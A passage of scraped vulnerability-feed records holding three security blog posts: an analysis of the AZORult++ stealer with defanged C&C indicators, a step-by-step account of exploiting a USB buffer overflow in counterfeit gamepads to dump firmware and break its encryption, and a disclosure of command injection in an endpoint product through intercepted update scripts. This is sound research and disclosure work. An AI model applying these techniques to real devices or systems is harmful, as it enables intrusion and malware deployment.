a number of malicious files detected by our products caught the eye. Although similar to AZORult already known to us, unlike the original malware, they were written not in Delphi, but in C++. A clear hint at the link between them comes from a section of code left by the developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110344/190319-azorult-analysis-history-3.png>)\n\nIt appears that the acolytes of CrydBrox, the very one who pulled the plug on AZORult, decided to rewrite it in C++; this version we call AZORult++. The presence of lines containing a path to debugging files likely indicates that the malware is still in development, since developers usually try to remove such code as soon as feasible.\n\nAZORult++ starts out by checking the language ID through a call to the GetUserDefaultLangID() function. If AZORult++ is running on a system where the language is identified as Russian, Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Tajik, Turkmen, or Uzbek, the malware stops executing.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110344/190319-azorult-analysis-history-4.png>)\n\nA more detailed analysis reveals that the C++ version is deficient compared to AZORult 3.3, the last iteration to be sold. In particular, there is no loader functionality and no support for stealing saved passwords from many of the browsers supported by AZORult 3.3. At the same time, many signature features of the Delphi-based version 3.3 are present in AZORult++, including the algorithm for communication with the C&C server, the command format, the structure and method of storing harvested data, and encryption keys.\n\nLike AZORult 3.3, AZORult++ uses an XOR operation with a 3-byte key to encrypt data sent to the C&C server. What's more, this key we had already encountered in various modifications of version 3.3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110359/190319-azorult-analysis-history-5.png>)\n\n \n_Examples of different versions of AZORult in operation (data encrypted using XOR)_\n\nThe malware collects stolen data in RAM and does not write to the hard drive to keep its actions hidden. A comparison of the data sent in the first packet (the ID of the infected device) shows that AZORult++ uses a shorter string than AZORult 3.3 for identification:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110335/190319-azorult-analysis-history-6.png>)\n\nThe server response also contains far less data. In version 3.3, the response contained a command in the form \"++++-+-+-\", specifying the bot configuration and a link for downloading additional malware, plus several binary files needed for the stealer to work. The string \"++++-+-+-\" is parsed by the Trojan character-by-character; \"+\" in a specific position signifies a command to execute certain actions (for example, harvesting of cryptowallet files). The current version of AZORult++ employs a shorter, yet similar command:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110341/190319-azorult-analysis-history-7.png>)\n\nIt is worth mentioning separately that the resulting configuration string is not processed correctly; the code execution does not depend on the value \"+\" or \"-\" in the string, since the characters are checked against \\x00 for a match. In other words, the resulting command does not affect the stealer's behavior:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110335/190319-azorult-analysis-history-8.png>)\n\nThis seems to be an error on the part of the developer, which suggests again that the project is in the very early stages of development. Going forward, these bugs are expected to be eliminated and the functionality of AZORult++ expanded.\n\n## ++ up the sleeve\n\nFor all its flaws, AZORult++ could actually be more dangerous than its predecessor due to its ability to establish a **remote connection to the desktop**. To do so, AZORult++ creates a user account using the NetUserAdd() function (username and password are specified in the AZORult++ code), before adding this account to the Administrators group:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110336/190319-azorult-analysis-history-9.png>)\n\nNext, AZORult++ hides the newly created account by setting the value of the _Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist_ registry key to 0. Likewise, through setting registry key values, a Remote Desktop Protocol (RDP) connection is allowed:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110335/190319-azorult-analysis-history-10.png>)\n\nThe malicious cherry on the cake is a call to ShellExecuteW() to open a port to establish a remote connection to the desktop:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22110333/190319-azorult-analysis-history-11.png>)\n\nAfter that, the infected computer is ready to accept the incoming RDP connection, which allows the cybercriminal \u2014 armed with the victim's IP address and account information \u2014 to connect to the infected computer and seize complete control of it.\n\n## Conclusion\n\nDuring development, AZORult underwent several changes related to the expansion of its functionality. Moreover, despite its many flaws, the C++ version is already more threatening than its predecessor due to the ability to establish a remote connection to the desktop. Because AZORult++ is likely still in development, we should expect its functionality to expand and bugs to be eliminated, not to mention attempts to distribute it widely under a name that buyers will recognize.\n\n## IoC\n\n**C&C servers** \nhttp://ravor.ac[.]ug \nhttp://daticho.ac[.]ug\n\n**MD5** \n08EB8F2E441C26443EB9ABE5A93CD942 \n5B26880F80A00397BC379CAF5CADC564 \nB0EC3E594D20B9D38CC8591BAFF0148B \nFE8938F0BAAF90516A90610F6E210484", "modified": "2019-03-22T11:13:43", "published": "2019-03-22T11:13:43", "id": "SECURELIST:A207453E5ADD84B940C3B2EF6CBEFFCF", "href": "https://securelist.com/azorult-analysis-history/89922/", "type": "securelist", "title": "AZORult++: Rewriting history", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-21T17:10:08", "bulletinFamily": "blog", "description": "\n\nIn this article, I want to demonstrate extracting the firmware from a secure USB device running on the Cortex M0.\n\n## Who hacks video game consoles?\n\nThe manufacture of counterfeit and unlicensed products is widespread in the world of video game consoles. It's a multi-billion dollar industry in which demand creates supply. You can now find devices for almost all the existing consoles that allow you to play copies of licensed video game 'backups' from flash drives, counterfeit gamepads and accessories, various adapters, some of which give you an advantage over other players, and devices for the use of cheats in online and offline video games. There are even services that let you buy video game achievements without having to spend hours playing. Of course, this is all sold without the consent of the video game console manufacturers.\n\nModern video game consoles, just like 20 years ago, are proprietary systems where the rules are set by the hardware manufacturers, and not by the millions of customers using those devices. A variety of protective measures are included in their design to ensure these consoles only run signed code, so they only play licensed and legally acquired video games and all players have equal rights and only play with officially licensed accessories. In some countries it's even [illegal](<https://www.theverge.com/2015/10/27/9622560/jailbreak-video-game-console-sony-microsoft-dmca>) to try and hack **your own** video game console.\n\nBut at the same time the very scale of the protection makes these consoles an attractive target and one big 'crackme' for enthusiasts interested in information security and reverse engineering. The more difficult the puzzle, the more interesting it is to solve. Especially if you've grown up with a love for video games.\n\n## Protection scheme of DualShock 4\n\nReaders who follow my [twitter](<https://twitter.com/oct0xor>) account may know that I'm a long-time fan of reverse engineering video game consoles and everything related to them, including unofficial game devices. In the early days of PlayStation 4, a publicly known [vulnerability](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9322>) in the FreeBSD kernel (which PlayStation 4 is based on) let me and many other researchers take a look at the architecture and inner workings of the new game console from Sony. I carried out a lot different research, some of which included looking at how USB authentication works in PlayStation 4 and how it distinguishes licensed devices and blocks unauthorized devices. This subject was of interest because I had previously done similar research on [other consoles](<https://oct0xor.github.io/2017/05/03/xsm3/>). PlayStation 4's authentication scheme turned out to be much simpler than that used in Xbox 360, but no less effective.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094302/hacking-microcontroller-firmware-through-a-usb-1.png>)\n\n \n_Authorization scheme of PlayStation 4 USB accessories_\n\nPS4 sends 0x100 random bytes to DualShock 4 and in response the gamepad creates an RSASSA-PSS SHA-256 signature and sends it back among the cryptographic constants N and E (public key) needed to verify it. These constants are unique for all manufactured DualShock 4 gamepads. The gamepad also sends a signature needed for verification of N and E. It uses the same RSASSA-PSS SHA-256 algorithm, but the cryptographic constants are equal for all PlayStation 4 consoles and are stored in the kernel.\n\nThis means that if you want to authenticate your own USB device, it's not enough to hack the PlayStation 4 kernel \u2013 you need the private key stored inside the gamepad. And even if someone manages to hack a gamepad and obtains the private key, Sony can still blacklist the key with a firmware update. If after eight minutes a game console has not received an authentication response it stops communication with the gamepad and you need to remove it from the USB port and plug it in again to get it to work. That's how the early counterfeit gamepads worked by simulating a USB port unplug/plug process every eight minutes, and it was very annoying for anyone who bought them.\n\n## Rumors of super counterfeit DualShock 4\n\nThere were no signs of anyone hacking this authentication scheme for quite some time until I heard rumors about new fake gamepads on the market that looked and worked just like the original. I really wanted to take a look at them, so I ordered a few from Chinese stores.\n\nWhile I was waiting for my parcels to arrive, I decided to try and gather more information about counterfeit gamepads. After quite a few search requests I found a gamepad known as Gator Claw.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094257/hacking-microcontroller-firmware-through-a-usb-2.png>)\n\n \n_Unauthorized Gator Claw gamepad_\n\nThere was an interesting discussion on Reddit where people were saying that it worked just like other unauthorized gamepads but only for eight minutes, but that the developers had managed to fix this with a firmware update. The store included a link to the firmware update and a manual.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094257/hacking-microcontroller-firmware-through-a-usb-3.png>)\n\n \n_Firmware update manual for Gator Claw_\n\n## Basics of embedded firmware analysis\n\nThe first thing I did was to take a look at the resource section of the firmware updater executable.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094254/hacking-microcontroller-firmware-through-a-usb-4.png>)\n\n \n_Firmware found in resources of Gator Claw's firmware updater_\n\nReaders who are familiar with writing code for embedded devices will most likely recognize this file format. This is an Intel HEX file format which is commonly used for programming microcontrollers, and many compilers (for example GNU Compiler) may output compiled code in this format. Also, we can see that the beginning of the firmware doesn't have high entropy and sequences of bytes are easily recognizable. That means the firmware is not encrypted or compressed. After decoding the firmware from Intel HEX format and loading in hex editor (010 Editor is able to open files directly in that format) we are able to take a look at it. What architecture is it compiled for? ARM Cortex-M is so widely adopted that I recognize it straight away.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094256/hacking-microcontroller-firmware-through-a-usb-5.png>)\n\n \n_Gator Claw's firmware (left) and vector table of ARM Cortex-M (right)_\n\nAccording to the [specification](<http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0497a/BABIFJFG.html>)s, the first double word is the initial stack pointer and after that comes the table of exception vectors. The first double word in this table is Reset vector that is used as the firmware entry point. The high addresses of other exception handlers give an idea of the firmware's base address.\n\nBesides firmware, the resource section of the firmware updater also contained a configuration file with a description of different microcontrollers. The developers of the firmware updater most probably used publicly available source code from the manufacturers of microcontrollers, which would explain why this configuration file came with source code.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094252/hacking-microcontroller-firmware-through-a-usb-6.png>)\n\n \n_Configuration file with description of different microcontrollers_\n\nAfter searching the microcontroller identificators from the config file, we found the site of the manufacturer \u2013 Nuvoton. Product information among technical documentation and the SDK is freely available for download without any license agreements.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094248/hacking-microcontroller-firmware-through-a-usb-7.png>)\n\n \n_The site of the Nuvoton microcontroller manufacturer _\n\nAt this point we have the firmware, we know its architecture and microcontroller manufacturer, and we have information about the base address, initial stack pointer and entry point. We have more information than we actually need to load the firmware in IDA Pro and start analyzing it.\n\nARM processors have two different instruction sets: ARM (32 bit instructions) and Thumb (16-bit instructions extended with Thumb-2 32-bit instructions). Cortex-M0 supports only Thumb mode so we will switch the radio button in \"Processor options \u2013 Edit ARM architecture options \u2013 Set ARM instructions\" to \"NO\" when loading the firmware in IDA Pro.\n\nAfter that we can see the firmware has loaded at base address 0 and automatic analysis has recognized almost every function. The question now is how to move forward with the reverse engineering of the firmware?\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094240/hacking-microcontroller-firmware-through-a-usb-8.png>)\n\n \n_Example of one of the many firmware functions _\n\nIf we analyze the firmware, we'll see that throughout it performs read and write operations to memory with the base address 0x40000000. This is the base address of memory mapped input output (MMIO) registers. These MMIO registers allow you to access and control all the microcontroller's peripheral components. Everything that the firmware does happens through access to them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094233/hacking-microcontroller-firmware-through-a-usb-9.png>)\n\n \n_Memory map of peripheral controllers_\n\nBy searching through the technical documentation for the address 0x40000000 we find that this microcontroller belongs to the M451 family. Now that we know the family of the microcontroller, we are able to download the SDK and code samples for this platform. In the SDK we find a header file with a definition of all MMIO addresses, bit fields and structures. We can also compile code samples with all the libraries and compare them with functions in our IDB, or we can look for the names of the MMIO addresses in the source code and compare it with our disassembly. This makes the process of reverse engineering straightforward. That's because we know the architecture and model of the microcontroller and we have a definition of all MMIO registers. Analysis would be much more complicated if we didn't have this information. It's fair to say that is why many vendors only distribute the SDK after an NDA is signed.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094237/hacking-microcontroller-firmware-through-a-usb-10.png>)\n\n \n_Finding library functions in the firmware_\n\n## In the shadow of colossus\n\nI analyzed Gator Claw's firmware while waiting for my fake gamepad to arrive. There wasn't much of interest inside \u2013 authentication data is sent to another microcontroller accessible over I2C and the response is sent back to the console. The developers of this unlicensed gamepad knew that this firmware may be reverse engineered and the existence of more counterfeit gamepads may hurt their business. To prevent this, another microcontroller was used for the sole purpose of keeping secrets safe. And this is common practice. The hackers put a lot of effort into their product and don't want to be hacked too. What really caught my attention in this firmware was the presence of some seemingly unused string. Most likely it was meant to be part of a USB Device Descriptor but that particular descriptor was left unused. Was this string left on purpose? Is it some kind of signature? Quite probably, because this string is the name of a major hardware manufacturer best known for their logic analyzers. But it also turns out they have a gaming division that aims to be an original equipment manufacturer (OEM) and even has a number of patents related to the production of gaming accessories. Besides that, they also have subsidiary and their site has huge assortment of gaming accessories sold under a single brand. Among the products on sale are two dozen adapters that allow the gamepads of one console to be used with another console. For example, there's one product that lets you connect the gamepad of an Xbox 360 to PlayStation 4, another product that lets you connect a PlayStation 3 gamepad to Xbox One, and so on, including a universal 'all in one'. The list of products also includes adapters that allow you to connect a PC mouse and keyboard to the PS4, Xbox One and Nintendo Switch video game consoles, various gamepads and printed circuit boards to create your own arcade controllers for gaming consoles. All the products come with firmware updaters similar to the one that was provided for Gator Claw, but with one notable difference \u2013 all the firmware is encrypted.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094235/hacking-microcontroller-firmware-through-a-usb-11.png>)\n\n \n_Example of manual and encrypted firmware from resources for one of the products_\n\nThe printed circuit boards for creating your own arcade controllers let you take a look at PCB design without buying a device and taking it apart. Their design is most likely very close to that of Gator Claw. We can see two microcontrollers; one of them should be Nuvoton M451 and the other is an additional microcontroller to store secrets. All traces go to the microcontroller under black epoxy, so it should be the main microcontroller, and the microcontroller with the four yellow pins seems to have what's required to work over I2C.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094238/hacking-microcontroller-firmware-through-a-usb-12.png>)\n\n \n_Examples of product PCB design_\n\n## Revelations\n\nBy this time I had finally received my parcel from Shenzhen and this is what I found inside. I think you'll agree that the counterfeit gamepad looks exactly like the original DualShock 4. And it feels like it too. It's a wireless gamepad made with good quality materials and has a working touch pad, speaker and headset port.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094226/hacking-microcontroller-firmware-through-a-usb-13.png>)\n\n \n_Counterfeit DualShock 4 (from the outside)_\n\nI pressed one of the combinations found in the update instructions and powered it on. The gamepad booted into DFU mode! After connecting the gamepad to a PC in this mode it was recognized as another device with different identifiers and characteristics. I already knew what I was going to see inside\u2026\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094230/hacking-microcontroller-firmware-through-a-usb-14.png>)\n\n \n_Counterfeit DualShock 4 (view of main PCB)_\n\nI soldered a few wires to what looked like JTAG points and connected it to a JTAG programmer. The programming tool recognized the microcontroller, but a Security Lock was set.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094220/hacking-microcontroller-firmware-through-a-usb-15.png>)\n\n \n_Programming tool recognized microcontroller but Security Lock was enabled_\n\n## Hacking microcontroller firmware through a USB\n\nAfter this rather lengthy introduction, it's now time to return to the main subject of this article. USB (Universal Serial Bus) is an industry standard for peripheral devices. It's designed to be very flexible and allow a wide range of applications. USB protocol defines two entities \u2013 one host to whcih other devices connect. USB devices are divided into classes such as hub, human interface, printer, imaging, mass storage device and others.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094217/hacking-microcontroller-firmware-through-a-usb-16.png>)\n\n \n_Connection scheme of USB devices_\n\nData and control exchange between the devices with the host happens through a set of uni-directional or bi-directional pipes. By pipes we consider data transfers between host software and a particular endpoint on a USB device. One device may have many different endpoints to exchange different types of data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094220/hacking-microcontroller-firmware-through-a-usb-17.png>)\n\n \n_Data transfer types_\n\nThere are four different types of data transfers:\n\n * Control Transfers (used to configure a device)\n * Bulk Data Transfers (generated or consumed in relatively large and bursty quantities)\n * Interrupt Data Transfers (used for timely but reliable delivery of data)\n * Isochronous Data Transfers (occupy a prenegotiated amount of USB bandwidth with a prenegotiated delivery latency)\n\nAll USB devices must support a specially designated pipe at endpoint zero to which the USB device's control pipe will be attached.\n\nThose types of data transfers are implemented with the use of packets provided according to the scheme below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094211/hacking-microcontroller-firmware-through-a-usb-18.png>)\n\n \n_Packets used in USB protocol_\n\nIn fact, USB protocol is a state machine and in this article we are not going to examine all those packets. Below you can see an example of the packets used in a Control Transfer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094203/hacking-microcontroller-firmware-through-a-usb-19.png>)\n\n \n_Control Transfer_\n\nUSB devices may contain vulnerabilities when implementing Bulk Transfers, Interrupt Transfers, Isochronous Transfers, but those types of data transfers are optional and their presence and usage will vary from target to target. But all USB devices support Control Transfers. Their format is common and this makes this type of data transfer the most attractive to analyze for vulnerabilities.\n\nThe scheme below shows the format of the SETUP packet used to perform a Control Transfer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094208/hacking-microcontroller-firmware-through-a-usb-20.png>)\n\n \n_Format of SETUP packet_\n\nThe SETUP packet occupies 8 bytes and it can be used to obtain different types of data depending on the type of request. Some requests are common for all devices (for example GET DESCRIPTOR); others depend on the class of device and manufacturer permission. The length of data to send or receive is a 16-bit word provided in the SETUP packet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094205/hacking-microcontroller-firmware-through-a-usb-21.png>)\n\n \n_Examples of standard and class-specific requests_\n\nSumming up: Control Transfers use a very simple protocol that's supported by all USB devices. It can have lots of additional requests and we can control the size of data. All of that makes Control Transfers a perfect target for fuzzing and glitching.\n\n## Exploitation\n\nTo hack my counterfeit gamepad I didn't have to fuzz it because I found vulnerabilities while I was looking at the Gator Claw code.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094152/hacking-microcontroller-firmware-through-a-usb-22.png>)\n\n \n_Vulnerable code in handler of HID class requests_\n\nFunction **HID_ClassRequest()** is present to emulate the work of the original DualShock 4 gamepad and implements the bare minimum of required requests to get it working with PlayStation 4. **USBD_GetSetupPacket()** gets the SETUP packet and depending on the type of report it will either send data with the function **USBD_PrepareCntrlIn()** or will receive with the function **USBD_PrepareCntrlOut()**. This function doesn't check the length of the requested data and this should allow us to read part of the internal Flash memory where the firmware is located and also read and write to the beginning of SRAM memory.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094133/hacking-microcontroller-firmware-through-a-usb-23.png>)\n\n \n_Buffer overflow during Control Transfer_\n\nThe size of the DATA packet is defined in the USB Device Descriptor (also received with the Control Transfer), but what seems to be left unnoticed is the fact that this size defines the length of a single packet and there may be lots of packets depending on the length set in the SETUP packet.\n\nIt is noteworthy that the code samples provided on the site of Nuvoton also don't have checks for length and it could lead to the spread of similar bugs in all products that used this code as a reference.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094137/hacking-microcontroller-firmware-through-a-usb-24.png>)\n\n \n_Exploitation of buffer overflow in SRAM memory_\n\nSRAM (static random access memory) is a memory that among other things is occupied by stack. SRAM is often also executable memory (this is configurable). This is usually done to increase performance by making firmware copy pieces of code that are often called (for example, Real-Time Operating System) to SRAM. There is no guarantee that the top of the stack will be reachable by buffer overflow, but the chances of that are nevertheless high.\n\nSurprisingly, the main obstacle to exploiting USB firmware is the operating system. The following was observed while I was working with Windows, but I think most of it also applies to Linux without special patches.\n\nFirst of all, the operating system doesn't let you read more than [4 kb](<https://msdn.microsoft.com/en-us/data/ff538112\\(v=vs.71\\)>) during a Control Transfer. Secondly, in my experience the operating system doesn't let you write more than a single DATA packet during a Control Transfer. Thirdly, the USB device may have hidden requests and all attempts to use them will be blocked by the OS.\n\nThis is easy to demonstrate with human interface devices (HID), including gamepads. HIDs come with additional descriptors (HID Descriptor, Report Descriptor, Physical Descriptor). A Report Descriptor is quite different from the other descriptors and consists of different items that describe supported reports. If a report is missing from Report Descriptor, then the OS will refuse to complete it, even if it's handled in the device. This basically detracts from the discovery and exploitation of vulnerabilities in the firmware of USB devices and those nuances most probably prevented the discovery of vulnerabilities in the past.\n\nTo solve this problem without having to read and recompile the sources of the Linux kernel, I just used low end instruments that I had available at hand: Arduino Mega board and USB Host Shield (total < $30).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094132/hacking-microcontroller-firmware-through-a-usb-25.png>)\n\n \n_Connection scheme_\n\nAfter connecting devices with the above scheme, I used the Arduino board to perform a Control Transfer without any interference from the operating system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094144/hacking-microcontroller-firmware-through-a-usb-26.png>)\n\n \n_Arduino Mega + USB Host Shield_\n\nThe counterfeit gamepad had the same vulnerabilities as Gator Claw and the first thing I did was to dump part of the firmware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094126/hacking-microcontroller-firmware-through-a-usb-27.png>)\n\n \n_Partial dump of firmware_\n\nThe easiest way to find the base address of the firmware dump is to find a structure with pointers to known data. After that we can calculate the delta of addresses and load a partial dump of the firmware to IDA Pro.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094119/hacking-microcontroller-firmware-through-a-usb-28.png>)\n\n \n_Structure with pointers to known data_\n\nThe firmware dump allowed us to find out the address of the **printf() **function that outputs the information in UART required for factory quality assurance. More than that, I was able to find the **hexdump()** function in the dump, meaning I didn't even need to write shellcode.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094122/hacking-microcontroller-firmware-through-a-usb-29.png>)\n\n \n_Finding functions that aid exploitation_\n\nAfter locating the UART points on the printed circuit board of the gamepad, soldering wires and connecting them to a TTL2USB adapter, we can see the output in a serial terminal.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094119/hacking-microcontroller-firmware-through-a-usb-30.png>)\n\n \n_Standard UART output during gamepad boot_\n\nA standard library for Nuvoton microcontrollers comes with a very handy handler of Hard Fault exceptions that outputs a register dump. This greatly facilitates in exploitation and allows exploits to be debugged.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094122/hacking-microcontroller-firmware-through-a-usb-31.png>)\n\n \n_UART output after Hard Fault exception caused by stack overwrite _\n\nA final exploit to dump firmware can be seen in the screenshot below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094124/hacking-microcontroller-firmware-through-a-usb-32.png>)\n\n \n_Exploit and shellcode to dump firmware over UART_\n\nBut this way to dump firmware is not perfect because the microcontrollers of the Nuvoton M451 family may have two different types of firmware \u2013 main firmware (APROM) and mini-firmware for device firmware update (LDROM).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094159/hacking-microcontroller-firmware-through-a-usb-33.png>)\n\n \n_Memory map of flash memory and system memory in different modes_\n\nAPROM and LDROM are mapped at the same memory addresses and because of that it's only possible to dump one of them. To get a dump of LDROM firmware we need to disable the security lock and read the flash memory with a programming tool.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094159/hacking-microcontroller-firmware-through-a-usb-34.png>)\n\n \n_Shellcode that disables security lock_\n\n## Crypto fail\n\nAnalysis of the firmware responsible for updates (LDROM) revealed that it's mostly standard code from Nuvoton, but with added code to decrypt firmware updates.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094159/hacking-microcontroller-firmware-through-a-usb-35.png>)\n\n \n_Cryptographic algorithm scheme for decryption of firmware updates _\n\nThe cryptographic algorithm used for decrypting firmware updates is a custom block cipher. It is performed in cipher block chaining mode, but the block size is just 32 bits. This algorithm takes a key that is a textual (ascii) identificator of the product and array of instructions that define what transformation should be performed on the current block. After encountering the end of the key and array their current position is set to the initial position. The list of transformations includes six operations: xor, subtraction, subtraction (reverse), and the same operations but with the bytes swapped. Because the firmware contains large areas filled with zeroes, it makes it easy to calculate the secret parts of this algorithm.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/21094140/hacking-microcontroller-firmware-through-a-usb-36.png>)\n\n \n_Revealing the firmware update encryption key_\n\nApplying the algorithm extracted from the firmware of the counterfeit gamepad to all the firmware of the accessories found on the site of a major OEM manufacturer revealed that all of them use this encryption algorithm, and the weaknesses in this algorithm allowed us to calculate the encryption keys for all devices and decrypt their firmware updates. In other words, the algorithm used inside the counterfeit product led to the security of all the products developed by that manufacturer being compromised.\n\n## Conclusion\n\nThis blog post turned out to be quite long, but I really wanted to prepare it for a very wide audience. I have given a step-by-step guide on the analysis of embedded firmware, finding vulnerabilities and exploiting them to acquire a firmware dump and to carry out code execution on a USB device.\n\nThe subject of glitching attacks is not included in the scope of this article, but such attacks are also very effective against USB devices. For those who want to learn more about them, I recommend watching [this video](<https://www.youtube.com/watch?v=TeCQatNcF20>). For those wondering how pirates managed to acquire the algorithm and key from DualShock 4 to make their own devices, I suggest reading [this article](<https://fail0verflow.com/blog/2018/ps4-ds4/>).\n\nAs for the mystery of the auxiliary microcontroller that was used to keep secrets, I found out that it was not used in all devices and was only added for obscurity. This microcontroller doesn't keep any secrets and is only used for SHA1 and SHA256. This research also aids enthusiasts to create their own open source projects for use with game consoles.\n\nAs for buyers of counterfeit gamepads, they are not in an enviable position because manufacturers block illegally used keys and the users end up without a working gamepad or hints on where to get firmware updates.", "modified": "2019-03-21T16:00:02", "published": "2019-03-21T16:00:02", "id": "SECURELIST:31EA06D9A426C6D0FE0CB7F9ED575A6E", "href": "https://securelist.com/hacking-microcontroller-firmware-through-a-usb/89919/", "type": "securelist", "title": "Hacking microcontroller firmware through a USB", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "pentestpartners": [{"lastseen": "2019-03-22T09:21:33", "bulletinFamily": "blog", "description": "\n\n### TL;DR?\n\nWe discovered command injection in a popular endpoint security product, Heimdal Thor. By using the product, customers PCs were exposed to compromise. Irony++\n\nHeimdal fixed the issue quickly and responded well, but it appears that the vulnerability had been present in ~650,000 PCs for around one year!\n\nThere's the [CVE here](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8351>), and Heimdal [blogged about it](<https://support.heimdalsecurity.com/hc/en-us/articles/360001084158-Release-2-5-172-PROD-Update>), but er\u2026 didn\u2019t mention the remote command injection!\n\n### How did we find it? During an automotive IoT pen test, of course!\n\nDuring hardware tests, we often setup a Wi-Fi access point and attempt to redirect the device\u2019s traffic through an intercepting proxy, like Burp Suite. Why? Because a disturbingly large number of embedded devices don\u2019t check the identity of servers, which allows us to act as a man-in-the-middle.\n\nNormally, if you connect a Windows laptop to one of these access points, you will be inundated with SSL/TLS etc. certificate errors and applications that flat-out refuse to communicate, as doing so wouldn\u2019t be secure. Most software developers have realised that checking who you are communicating with is as important as encrypting the communications.\n\n### MITM\n\nI was reviewing my Burp Suite traffic during a hardware test. As expected, the device under test hadn\u2019t checked the identity of the server, allowing me to tamper with the firmware update process. But then I saw a different request. One that clearly contained details of a Windows machine:\n\n\n\nEarlier in the day, one of our customer\u2019s staff had connected his laptop to the access point to observe another issue we had found. During this period, most software on his machine noticed the crude attempts to tamper with traffic and stopped communicating.\n\nBut not _all _the software.\n\nThe domain it was communicating with \u2013 coreservice.heimdalsecurity.com \u2013 quickly led us to the culprit \u2013 [Heimdal Thor](<https://heimdalsecurity.com>). It appears to combine aspects of endpoint protection and automated software updates.\n\nMy first suspicion was that somehow, in the past, I had installed a Burp Suite certificate on the laptop. A quick check of the certificate store showed this wasn\u2019t the case.\n\nTen minutes later, I have an evaluation copy of Heimdal Thor running inside of a virtual machine, and I\u2019m seeing the same behaviour \u2013 I can intercept HTTPS communication without being noticed.\n\nHeimdal Thor also does automated software updates. I could see JSON lists of software being downloaded, containing a URL, version etc.. And in those lists, parameters called \u201cbeforeInstallScript\u201d and \u201cafterInstallScript\u201d.\n\n\n\nSo I could easily add in my own commands to be run:\n\n\n\nSo, when the client updates that piece of software, the commands will execute.\n\n\n\n**We can now run arbitrary commands on the client!**\n\nEndpoint protection products have to run with high privilege, so if an attacker can intercept traffic between your machine and the servers, they can take control of your machine.\n\nYes, the attacker needs to be able to intercept traffic, but an ideal location would be an open Wi-Fi access point in a coffee shop. Or one could compromise a home Wi-Fi network (weak PSK?) and then compromise the PCs on that home network.\n\nThe irony is not lost on us: a security product that makes you less secure\u2026\n\n### Disclosure\n\nThis was reported to Heimdal Thor immediately.\n\nIt took them a few days to respond, and the response was very\u2026 honest.\n\nIt turns out that changes had been made to the software, bypassing certificate validation, probably to temporarily cure a functionality problem. This appeared to have been present for up to a year\n\nThe issue was fixed and automatically deployed in around 10 days \u2013 not bad for a large software deployment.\n\nIt\u2019s often the disclosure process that\u2019s a train wreck, but actually Heimdal did a good job of this.\n\nHowever, we still can\u2019t figure out why Heimdal downplayed the issue quite so much in their blog. To 